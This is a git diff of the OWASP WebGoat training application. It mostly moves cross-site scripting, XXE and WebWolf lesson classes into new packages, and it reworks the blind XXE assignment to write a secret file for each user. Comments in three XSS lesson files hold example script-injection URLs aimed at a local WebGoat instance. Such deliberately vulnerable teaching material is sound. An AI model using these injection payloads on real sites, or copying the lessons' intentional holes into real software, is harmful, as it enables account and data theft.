-        modelAndView.setViewName("webwolfPasswordReset");
+        modelAndView.setViewName("lessons/webwolf_introduction/templates/webwolfPasswordReset.html");
         return modelAndView;
     }
 }
diff --git a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/MailAssignment.java b/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/MailAssignment.java
similarity index 94%
rename from webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/MailAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/MailAssignment.java
index dd5967aa6..4d7af9279 100644
--- a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/MailAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/MailAssignment.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.webwolf_introduction;
+package org.owasp.webgoat.lessons.webwolf_introduction;
 
 import org.apache.commons.lang3.StringUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/WebWolfIntroduction.java b/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/WebWolfIntroduction.java
similarity index 89%
rename from webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/WebWolfIntroduction.java
rename to src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/WebWolfIntroduction.java
index a37b35ef2..818222e3b 100644
--- a/webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/webwolf_introduction/WebWolfIntroduction.java
+++ b/src/main/java/org/owasp/webgoat/lessons/webwolf_introduction/WebWolfIntroduction.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.webwolf_introduction;
+package org.owasp.webgoat.lessons.webwolf_introduction;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/Comment.java b/src/main/java/org/owasp/webgoat/lessons/xss/Comment.java
similarity index 90%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/Comment.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/Comment.java
index ea1f323f0..eea482a34 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/Comment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/Comment.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScripting.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
similarity index 90%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScripting.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
index 898d13838..ca0f14c0a 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScripting.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScripting.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1.java
similarity index 91%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1.java
index f9141c93d..c6326eb97 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1.java
@@ -21,10 +21,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson3.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson3.java
similarity index 93%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson3.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson3.java
index 41bcec5a2..b5a643e73 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson3.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson3.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
 import org.jsoup.Jsoup;
 import org.jsoup.nodes.Document;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson4.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson4.java
similarity index 91%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson4.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson4.java
index 7b4ef5b9d..d6df6b1fc 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson4.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson4.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson5a.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
similarity index 93%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson5a.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
index b12fc0e2b..6c679c819 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson5a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson5a.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson6a.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson6a.java
similarity index 87%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson6a.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson6a.java
index a61a53034..ce8f2f620 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson6a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson6a.java
@@ -21,12 +21,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/mitigation/CrossSiteScriptingMitigation.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
similarity index 90%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/mitigation/CrossSiteScriptingMitigation.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
index bb421d4e2..dba6c36d0 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/mitigation/CrossSiteScriptingMitigation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingMitigation.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss.mitigation;
+package org.owasp.webgoat.lessons.xss;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 
 public class CrossSiteScriptingMitigation extends Lesson {
     @Override
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingQuiz.java b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingQuiz.java
similarity index 94%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingQuiz.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingQuiz.java
index ecba00272..7612f559a 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/CrossSiteScriptingQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingQuiz.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/DOMCrossSiteScripting.java b/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScripting.java
similarity index 90%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/DOMCrossSiteScripting.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScripting.java
index 58f8e46bc..e5e28b94b 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/DOMCrossSiteScripting.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScripting.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -52,4 +52,4 @@ public class DOMCrossSiteScripting extends AssignmentEndpoint {
     }
 }
 // something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E--andMoreGarbageHere
-// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
\ No newline at end of file
+// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/DOMCrossSiteScriptingVerifier.java b/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingVerifier.java
similarity index 88%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/DOMCrossSiteScriptingVerifier.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingVerifier.java
index 1db04bed5..d98b520a9 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/DOMCrossSiteScriptingVerifier.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingVerifier.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -52,4 +52,4 @@ public class DOMCrossSiteScriptingVerifier extends AssignmentEndpoint {
     }
 }
 // something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
-// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
\ No newline at end of file
+// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/CrossSiteScriptingStored.java b/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
similarity index 89%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/CrossSiteScriptingStored.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
index 5945a3a19..90cb74f32 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/CrossSiteScriptingStored.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/stored/CrossSiteScriptingStored.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss.stored;
+package org.owasp.webgoat.lessons.xss.stored;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 
 public class CrossSiteScriptingStored extends Lesson {
     @Override
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/StoredCrossSiteScriptingVerifier.java b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredCrossSiteScriptingVerifier.java
similarity index 89%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/StoredCrossSiteScriptingVerifier.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredCrossSiteScriptingVerifier.java
index 8f5138910..559b4cb6d 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/StoredCrossSiteScriptingVerifier.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredCrossSiteScriptingVerifier.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss.stored;
+package org.owasp.webgoat.lessons.xss.stored;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
@@ -51,4 +51,4 @@ public class StoredCrossSiteScriptingVerifier extends AssignmentEndpoint {
 }
 
 // something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
-// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
\ No newline at end of file
+// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/StoredXssComments.java b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
similarity index 93%
rename from webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/StoredXssComments.java
rename to src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
index fe3254644..36e1bdc44 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/stored/StoredXssComments.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xss/stored/StoredXssComments.java
@@ -20,17 +20,17 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss.stored;
+package org.owasp.webgoat.lessons.xss.stored;
 
-import com.beust.jcommander.internal.Lists;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import com.google.common.collect.Lists;
 import org.joda.time.DateTime;
 import org.joda.time.format.DateTimeFormat;
 import org.joda.time.format.DateTimeFormatter;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.xss.Comment;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.lessons.xss.Comment;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.GetMapping;
@@ -111,4 +111,4 @@ public class StoredXssComments extends AssignmentEndpoint {
             return new Comment();
         }
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/BlindSendFileAssignment.java b/src/main/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignment.java
similarity index 58%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/BlindSendFileAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignment.java
index 17f3b813a..96eb6f4a7 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/BlindSendFileAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignment.java
@@ -1,25 +1,26 @@
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.springframework.beans.factory.annotation.Autowired;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.beans.factory.annotation.Value;
-import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.annotation.PostConstruct;
-import javax.servlet.http.HttpServletRequest;
 import java.io.File;
 import java.io.IOException;
-import java.nio.charset.StandardCharsets;
 import java.nio.file.Files;
+import java.util.HashMap;
+import java.util.Map;
 
+import static java.nio.charset.StandardCharsets.UTF_8;
 import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
+import static org.springframework.http.MediaType.ALL_VALUE;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
 
 /**
  * ************************************************************************************************
@@ -45,46 +46,48 @@ import static org.apache.commons.lang3.RandomStringUtils.randomAlphabetic;
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
  * projects.
  * <p>
- *
- * @author nbaars
- * @version $Id: $Id
- * @since November 18, 2016
  */
 @Slf4j
 @RestController
 @AssignmentHints({"xxe.blind.hints.1", "xxe.blind.hints.2", "xxe.blind.hints.3", "xxe.blind.hints.4", "xxe.blind.hints.5"})
 public class BlindSendFileAssignment extends AssignmentEndpoint {
 
-    static final String CONTENTS = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";
-    @Value("${webgoat.user.directory}")
-    private String webGoatHomeDirectory;
-    @Autowired
-    private Comments comments;
+    private final String webGoatHomeDirectory;
+    private final CommentsCache comments;
+    private final Map<WebGoatUser, String> userToFileContents = new HashMap<>();
 
-    @PostConstruct
-    public void createSecretFileWithRandomContents() {
-        File targetDirectory = new File(webGoatHomeDirectory, "/XXE");
+    public BlindSendFileAssignment(@Value("${webgoat.user.directory}") String webGoatHomeDirectory, CommentsCache comments) {
+        this.webGoatHomeDirectory = webGoatHomeDirectory;
+        this.comments = comments;
+    }
+
+    private void createSecretFileWithRandomContents(WebGoatUser user) {
+        var fileContents = "WebGoat 8.0 rocks... (" + randomAlphabetic(10) + ")";
+        userToFileContents.put(user, fileContents);
+        File targetDirectory = new File(webGoatHomeDirectory, "/XXE/" + user.getUsername());
         if (!targetDirectory.exists()) {
-            targetDirectory.mkdir();
+            targetDirectory.mkdirs();
         }
         try {
-            Files.writeString(new File(targetDirectory, "secret.txt").toPath(), CONTENTS, StandardCharsets.UTF_8);
+            Files.writeString(new File(targetDirectory, "secret.txt").toPath(), fileContents, UTF_8);
         } catch (IOException e) {
             log.error("Unable to write 'secret.txt' to '{}", targetDirectory);
         }
     }
 
-    @PostMapping(path = "xxe/blind", consumes = MediaType.ALL_VALUE, produces = MediaType.APPLICATION_JSON_VALUE)
+    @PostMapping(path = "xxe/blind", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
     @ResponseBody
-    public AttackResult addComment(HttpServletRequest request, @RequestBody String commentStr) {
-        //Solution is posted as a separate comment
-        if (commentStr.contains(CONTENTS)) {
+    public AttackResult addComment(@RequestBody String commentStr) {
+        var fileContentsForUser = userToFileContents.getOrDefault(getWebSession().getUser(), "");
+
+        //Solution is posted by the user as a separate comment
+        if (commentStr.contains(fileContentsForUser)) {
             return success(this).build();
         }
 
         try {
             Comment comment = comments.parseXml(commentStr);
-            if (CONTENTS.contains(comment.getText())) {
+            if (fileContentsForUser.contains(comment.getText())) {
                 comment.setText("Nice try, you need to send the file to WebWolf");
             }
             comments.addComment(comment, false);
@@ -93,4 +96,11 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
         }
         return failed(this).build();
     }
+
+    @Override
+    public void initialize(WebGoatUser user) {
+        comments.reset(user);
+        userToFileContents.remove(user);
+        createSecretFileWithRandomContents(user);
+    }
 }
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comment.java b/src/main/java/org/owasp/webgoat/lessons/xxe/Comment.java
similarity index 97%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comment.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/Comment.java
index da8993bf5..37a5b42f1 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/Comment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
similarity index 70%
rename from webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java
rename to src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
index fb985b4c9..6c7ff32b4 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java
+++ b/src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java
@@ -20,15 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
-import com.beust.jcommander.internal.Lists;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import org.joda.time.DateTime;
 import org.joda.time.format.DateTimeFormat;
 import org.joda.time.format.DateTimeFormatter;
-import org.owasp.webgoat.session.WebSession;
-import org.springframework.beans.factory.annotation.Autowired;
+import org.owasp.webgoat.container.session.WebSession;
+import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.context.annotation.Scope;
 import org.springframework.stereotype.Component;
 
@@ -40,47 +39,50 @@ import javax.xml.stream.XMLStreamException;
 import java.io.IOException;
 import java.io.StringReader;
